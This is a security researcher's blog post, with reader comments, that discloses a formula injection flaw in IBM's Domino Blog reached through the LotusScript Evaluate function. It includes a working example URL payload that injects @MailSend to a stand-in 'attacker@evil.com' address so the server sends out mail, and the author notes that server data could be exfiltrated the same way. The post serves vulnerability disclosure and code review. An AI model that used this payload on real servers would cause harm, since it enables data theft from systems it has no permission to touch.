Saturday, November 19, 2011

New security vulnerability: Lotus Notes Formula Injection

From time to time, I get an opportunity to do some independent research. Something that has always particularly peaked my interest is Lotus Notes environments, both the administration and development platform. I feel what makes it an interesting environment is:

1. The focus is business applications
2. There has never been a significant focus from the IT security industry (Fortify doesn't even scan Lotus code)
3. My father happens to be a Lotus Notes Certified Developer.

These three points make an interesting recipe for security assessments.

Back in April 2010 I was having a usual tech talk with my dad about IT in general and software development practices. This is when I was introduced to the Domino Blog. Domino Blog is a Lotus Notes application offered by IBM as a weblog solution. It is generally intended for social media networking, allowing users to post topics and allow the general public to supply comments. This application is deployed within a Lotus Domino
environment and is utilized by a wide audience, from IBM employees to the general public.

My dad happened to have this setup on one of his servers, so it was all ready to break. To speed things up, we moved straight onto a secure code review of the application. The scope of tainted data was fairly limited, so it didn't take long to identify all the entry points, which makes the assessment much easier.
There are interesting functions in LotusScript, but one in particular is the 'Evaluate' function, which allows a Developer to build dynamic functionality by executing Lotus Notes Formula statements. For those who are familiar with other injection vulnerabilities (SQLi), I am sure the problem is becoming apparent.

It just so happens that in the Domino Blog there are Evaluate functions which are a sink for data received from HTTP requests without performing data encoding. To move straight onto an example payload it would look like this:


http://lotusnotesblogdomain.co.uk/blog.nsf/archive?openview&title=Motorbikes&type=cat&cat=");
@MailSend("attacker@evil.com";"";"";"Formula%20Injection";
"The%20email%body%belongs%here");
@IsText("


The payload above would force the Domino server to issue mail. As the Evaluate function supports wrapping of formula functions, it is trivial to start pulling data from the server and get it delivered to an email account.

An attacker simply requires the knowledge of how to correctly construct the statement to meet the requirements of the Evaluate function, and gain familiarity with the Formula language. As can be on the formula poster there is extremely powerful functionality that can make the payloads extremely interesting, and can certainly result in total compromise of the Lotus Notes server. I've appropriately coined this vulnerability Lotus Notes Formula Injection :)

Certainly add this to your list for web app or source code reviews of a Domino application.

Note: This was all responsibly disclosed to IBM in April 2010.

Update: 24/12/2011 - I thought it was pretty cool to see this picked up by WhiteHat Security and put in Jeremiah Grossman's blogspot 

6 comments:

Stephen de Vries said...

Interesting writeup! Are there any consistent errors produced when doing formula injection that would make it possible to test from a black box perspective?

Anonymous said...

Neat work Adam! Does this code injection vuln require authentication to be exploited?

Also, is there an IBM advisory for this finding? If so, I presume that scanners such as Nessus will release a plugin to identify this hole?

Unknown said...

Thanks for the comments guys.

@Stephen - Yes, there is a particular error that indicates the presence of this vulnerability.

@ap - There is no IBM advisory for this, it was kept pretty quiet. For this particular app, authentication is not required to exploit this.

This is an API vulnerability within LotusScript and is easily identifiable over the web (providing a custom error page is not in place, which is pretty typical in my experience).

Gerard Schut said...

I've tried the code on several of our local servers, but I've not received any messages, not do I see anything happening in the logs.

So either this is fixed in 8.5.2 and higher (as I don't have server running older version of Domino) or it's related to the specific blogging database.

If you want to dig deeper I can help.

Wouter Aukema said...

Interesting finding Adam. Can you give us the detailed steps on how to reproduce this vulnerability?

rahul said...
This comment has been removed by a blog administrator.